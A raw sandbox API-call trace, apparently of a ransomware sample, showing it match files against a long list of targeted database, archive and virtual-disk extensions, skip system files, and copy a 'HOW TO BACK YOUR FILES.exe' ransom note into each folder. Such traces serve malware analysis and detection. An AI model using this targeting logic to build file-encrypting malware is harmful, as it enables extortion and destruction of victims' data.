[0042.190] lstrcmpiW (lpString1="txt", lpString2="ihx") returned 1 [0042.190] lstrlenW (lpString="itdb") returned 4 [0042.190] lstrcmpiW (lpString1=".txt", lpString2="itdb") returned -1 [0042.190] lstrlenW (lpString="itw") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="itw") returned 1 [0042.190] lstrlenW (lpString="jet") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="jet") returned 1 [0042.190] lstrlenW (lpString="jtx") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="jtx") returned 1 [0042.190] lstrlenW (lpString="kdb") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="kdb") returned 1 [0042.190] lstrlenW (lpString="kexi") returned 4 [0042.190] lstrcmpiW (lpString1=".txt", lpString2="kexi") returned -1 [0042.190] lstrlenW (lpString="kexic") returned 5 [0042.190] lstrcmpiW (lpString1="g.txt", lpString2="kexic") returned -1 [0042.190] lstrlenW (lpString="kexis") returned 5 [0042.190] lstrcmpiW (lpString1="g.txt", lpString2="kexis") returned -1 [0042.190] lstrlenW (lpString="lgc") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="lgc") returned 1 [0042.190] lstrlenW (lpString="lwx") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="lwx") returned 1 [0042.190] lstrlenW (lpString="maf") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="maf") returned 1 [0042.191] lstrlenW (lpString="maq") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="maq") returned 1 [0042.191] lstrlenW (lpString="mar") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mar") returned 1 [0042.191] lstrlenW (lpString="marshal") returned 7 [0042.191] lstrcmpiW (lpString1="log.txt", lpString2="marshal") returned -1 [0042.191] lstrlenW (lpString="mas") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mas") returned 1 [0042.191] lstrlenW (lpString="mav") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mav") returned 1 [0042.191] lstrlenW (lpString="maw") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="maw") returned 1 [0042.191] lstrlenW (lpString="mdbhtml") returned 7 [0042.191] lstrcmpiW (lpString1="log.txt", lpString2="mdbhtml") returned -1 [0042.191] lstrlenW (lpString="mdn") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mdn") returned 1 [0042.191] lstrlenW (lpString="mdt") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mdt") returned 1 [0042.191] lstrlenW (lpString="mfd") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mfd") returned 1 [0042.191] lstrlenW (lpString="mpd") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mpd") returned 1 [0042.191] lstrlenW (lpString="mrg") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mrg") returned 1 [0042.191] lstrlenW (lpString="mud") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mud") returned 1 [0042.191] lstrlenW (lpString="mwb") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="mwb") returned 1 [0042.191] lstrlenW (lpString="myd") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="myd") returned 1 [0042.191] lstrlenW (lpString="ndf") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="ndf") returned 1 [0042.191] lstrlenW (lpString="nnt") returned 3 [0042.191] lstrcmpiW (lpString1="txt", lpString2="nnt") returned 1 [0042.191] lstrlenW (lpString="nrmlib") returned 6 [0042.192] lstrcmpiW (lpString1="og.txt", lpString2="nrmlib") returned 1 [0042.192] lstrlenW (lpString="ns2") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="ns2") returned 1 [0042.192] lstrlenW (lpString="ns3") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="ns3") returned 1 [0042.192] lstrlenW (lpString="ns4") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="ns4") returned 1 [0042.192] lstrlenW (lpString="nsf") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="nsf") returned 1 [0042.192] lstrlenW (lpString="nv") returned 2 [0042.192] lstrcmpiW (lpString1="xt", lpString2="nv") returned 1 [0042.192] lstrlenW (lpString="nv2") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="nv2") returned 1 [0042.192] lstrlenW (lpString="nwdb") returned 4 [0042.192] lstrcmpiW (lpString1=".txt", lpString2="nwdb") returned -1 [0042.192] lstrlenW (lpString="nyf") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="nyf") returned 1 [0042.192] lstrlenW (lpString="odb") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="odb") returned 1 [0042.192] lstrlenW (lpString="odb") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="odb") returned 1 [0042.192] lstrlenW (lpString="oqy") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="oqy") returned 1 [0042.192] lstrlenW (lpString="ora") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="ora") returned 1 [0042.192] lstrlenW (lpString="orx") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="orx") returned 1 [0042.192] lstrlenW (lpString="owc") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="owc") returned 1 [0042.192] lstrlenW (lpString="p96") returned 3 [0042.192] lstrcmpiW (lpString1="txt", lpString2="p96") returned 1 [0042.193] lstrlenW (lpString="p97") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="p97") returned 1 [0042.193] lstrlenW (lpString="pan") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="pan") returned 1 [0042.193] lstrlenW (lpString="pdb") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="pdb") returned 1 [0042.193] lstrlenW (lpString="pdm") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="pdm") returned 1 [0042.193] lstrlenW (lpString="pnz") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="pnz") returned 1 [0042.193] lstrlenW (lpString="qry") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="qry") returned 1 [0042.193] lstrlenW (lpString="qvd") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="qvd") returned 1 [0042.193] lstrlenW (lpString="rbf") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="rbf") returned 1 [0042.193] lstrlenW (lpString="rctd") returned 4 [0042.193] lstrcmpiW (lpString1=".txt", lpString2="rctd") returned -1 [0042.193] lstrlenW (lpString="rod") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="rod") returned 1 [0042.193] lstrlenW (lpString="rodx") returned 4 [0042.193] lstrcmpiW (lpString1=".txt", lpString2="rodx") returned -1 [0042.193] lstrlenW (lpString="rpd") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="rpd") returned 1 [0042.193] lstrlenW (lpString="rsd") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="rsd") returned 1 [0042.193] lstrlenW (lpString="sas7bdat") returned 8 [0042.193] lstrcmpiW (lpString1="dlog.txt", lpString2="sas7bdat") returned -1 [0042.193] lstrlenW (lpString="sbf") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="sbf") returned 1 [0042.193] lstrlenW (lpString="scx") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="scx") returned 1 [0042.193] lstrlenW (lpString="sdb") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="sdb") returned 1 [0042.193] lstrlenW (lpString="sdc") returned 3 [0042.193] lstrcmpiW (lpString1="txt", lpString2="sdc") returned 1 [0042.194] lstrlenW (lpString="sdf") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="sdf") returned 1 [0042.194] lstrlenW (lpString="sis") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="sis") returned 1 [0042.194] lstrlenW (lpString="spq") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="spq") returned 1 [0042.194] lstrlenW (lpString="te") returned 2 [0042.194] lstrcmpiW (lpString1="xt", lpString2="te") returned 1 [0042.194] lstrlenW (lpString="teacher") returned 7 [0042.194] lstrcmpiW (lpString1="log.txt", lpString2="teacher") returned -1 [0042.194] lstrlenW (lpString="tmd") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="tmd") returned 1 [0042.194] lstrlenW (lpString="tps") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="tps") returned 1 [0042.194] lstrlenW (lpString="trc") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="trc") returned 1 [0042.194] lstrlenW (lpString="trc") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="trc") returned 1 [0042.194] lstrlenW (lpString="trm") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="trm") returned 1 [0042.194] lstrlenW (lpString="udb") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="udb") returned -1 [0042.194] lstrlenW (lpString="udl") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="udl") returned -1 [0042.194] lstrlenW (lpString="usr") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="usr") returned -1 [0042.194] lstrlenW (lpString="v12") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="v12") returned -1 [0042.194] lstrlenW (lpString="vis") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="vis") returned -1 [0042.194] lstrlenW (lpString="vpd") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="vpd") returned -1 [0042.194] lstrlenW (lpString="vvv") returned 3 [0042.194] lstrcmpiW (lpString1="txt", lpString2="vvv") returned -1 [0042.195] lstrlenW (lpString="wdb") returned 3 [0042.195] lstrcmpiW (lpString1="txt", lpString2="wdb") returned -1 [0042.195] lstrlenW (lpString="wmdb") returned 4 [0042.195] lstrcmpiW (lpString1=".txt", lpString2="wmdb") returned -1 [0042.195] lstrlenW (lpString="wrk") returned 3 [0042.195] lstrcmpiW (lpString1="txt", lpString2="wrk") returned -1 [0042.195] lstrlenW (lpString="xdb") returned 3 [0042.195] lstrcmpiW (lpString1="txt", lpString2="xdb") returned -1 [0042.195] lstrlenW (lpString="xld") returned 3 [0042.195] lstrcmpiW (lpString1="txt", lpString2="xld") returned -1 [0042.195] lstrlenW (lpString="xmlff") returned 5 [0042.195] lstrcmpiW (lpString1="g.txt", lpString2="xmlff") returned -1 [0042.195] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ab6e2e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0042.195] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0042.195] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ab6e2e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0042.195] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0042.195] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0042.195] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache" [0042.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0042.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.195] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned 58 [0042.195] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache" [0042.195] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.195] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.202] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.202] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.202] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.202] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.202] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.202] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.202] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.202] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.202] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.202] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.202] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfedc214c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1NBUR4HR", cAlternateFileName="")) returned 1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="aoldtz.exe") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2=".") returned 1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="..") returned 1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="windows") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="bootmgr") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="temp") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="pagefile.sys") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="boot") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="ids.txt") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="ntuser.dat") returned -1 [0042.202] lstrcmpiW (lpString1="1NBUR4HR", lpString2="perflogs") returned -1 [0042.203] lstrcmpiW (lpString1="1NBUR4HR", lpString2="MSBuild") returned -1 [0042.203] lstrlenW (lpString="1NBUR4HR") returned 8 [0042.203] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\*") returned 60 [0042.203] lstrcpyW (in: lpString1=0x2e2e8d6, lpString2="1NBUR4HR" | out: lpString1="1NBUR4HR") returned="1NBUR4HR" [0042.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0042.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9eb0 [0042.203] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0042.203] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfee8082e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6ASVN7J7", cAlternateFileName="")) returned 1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="aoldtz.exe") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2=".") returned 1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="..") returned 1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="windows") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="bootmgr") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="temp") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="pagefile.sys") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="boot") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="ids.txt") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="ntuser.dat") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="perflogs") returned -1 [0042.203] lstrcmpiW (lpString1="6ASVN7J7", lpString2="MSBuild") returned -1 [0042.203] lstrlenW (lpString="6ASVN7J7") returned 8 [0042.203] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 67 [0042.203] lstrcpyW (in: lpString1=0x2e2e8d6, lpString2="6ASVN7J7" | out: lpString1="6ASVN7J7") returned="6ASVN7J7" [0042.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0042.203] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9d90 [0042.203] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0042.203] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff06fa11, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D68G7BIJ", cAlternateFileName="")) returned 1 [0042.203] lstrcmpiW (lpString1="D68G7BIJ", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.203] lstrcmpiW (lpString1="D68G7BIJ", lpString2="aoldtz.exe") returned 1 [0042.203] lstrcmpiW (lpString1="D68G7BIJ", lpString2=".") returned 1 [0042.203] lstrcmpiW (lpString1="D68G7BIJ", lpString2="..") returned 1 [0042.203] lstrcmpiW (lpString1="D68G7BIJ", lpString2="windows") returned -1 [0042.204] lstrcmpiW (lpString1="D68G7BIJ", lpString2="bootmgr") returned 1 [0042.204] lstrcmpiW (lpString1="D68G7BIJ", lpString2="temp") returned -1 [0042.204] lstrcmpiW (lpString1="D68G7BIJ", lpString2="pagefile.sys") returned -1 [0042.204] lstrcmpiW (lpString1="D68G7BIJ", lpString2="boot") returned 1 [0042.204] lstrcmpiW (lpString1="D68G7BIJ", lpString2="ids.txt") returned -1 [0042.204] lstrcmpiW (lpString1="D68G7BIJ", lpString2="ntuser.dat") returned -1 [0042.204] lstrcmpiW (lpString1="D68G7BIJ", lpString2="perflogs") returned -1 [0042.204] lstrcmpiW (lpString1="D68G7BIJ", lpString2="MSBuild") returned -1 [0042.204] lstrlenW (lpString="D68G7BIJ") returned 8 [0042.204] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 67 [0042.204] lstrcpyW (in: lpString1=0x2e2e8d6, lpString2="D68G7BIJ" | out: lpString1="D68G7BIJ") returned="D68G7BIJ" [0042.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0042.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x88) returned 0x2e9d00 [0042.204] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2408 | out: ListHead=0x2e77d0, ListEntry=0x2d2408) returned 0x2d23e8 [0042.204] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9e3d85, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0042.204] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0042.204] lstrlenW (lpString="desktop.ini") returned 11 [0042.204] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 67 [0042.204] lstrcpyW (in: lpString1=0x2e2e8d6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0042.204] lstrlenW (lpString="desktop.ini") returned 11 [0042.204] lstrlenW (lpString="Ares865") returned 7 [0042.204] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0042.205] lstrlenW (lpString=".dll") returned 4 [0042.205] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0042.205] lstrlenW (lpString=".lnk") returned 4 [0042.205] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0042.205] lstrlenW (lpString=".ini") returned 4 [0042.205] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0042.205] lstrlenW (lpString=".sys") returned 4 [0042.205] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0042.205] lstrlenW (lpString="desktop.ini") returned 11 [0042.205] lstrlenW (lpString="bak") returned 3 [0042.205] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0042.205] lstrlenW (lpString="ba_") returned 3 [0042.205] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0042.205] lstrlenW (lpString="dbb") returned 3 [0042.205] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0042.205] lstrlenW (lpString="vmdk") returned 4 [0042.205] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0042.205] lstrlenW (lpString="rar") returned 3 [0042.205] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0042.205] lstrlenW (lpString="zip") returned 3 [0042.205] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0042.205] lstrlenW (lpString="tgz") returned 3 [0042.205] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0042.205] lstrlenW (lpString="vbox") returned 4 [0042.205] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0042.205] lstrlenW (lpString="vdi") returned 3 [0042.205] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0042.205] lstrlenW (lpString="vhd") returned 3 [0042.205] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0042.205] lstrlenW (lpString="vhdx") returned 4 [0042.205] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0042.205] lstrlenW (lpString="avhd") returned 4 [0042.205] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0042.205] lstrlenW (lpString="db") returned 2 [0042.205] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0042.205] lstrlenW (lpString="db2") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0042.206] lstrlenW (lpString="db3") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0042.206] lstrlenW (lpString="dbf") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0042.206] lstrlenW (lpString="mdf") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0042.206] lstrlenW (lpString="mdb") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0042.206] lstrlenW (lpString="sql") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0042.206] lstrlenW (lpString="sqlite") returned 6 [0042.206] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0042.206] lstrlenW (lpString="sqlite3") returned 7 [0042.206] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0042.206] lstrlenW (lpString="sqlitedb") returned 8 [0042.206] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0042.206] lstrlenW (lpString="xml") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0042.206] lstrlenW (lpString="$er") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0042.206] lstrlenW (lpString="4dd") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0042.206] lstrlenW (lpString="4dl") returned 3 [0042.206] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0042.206] 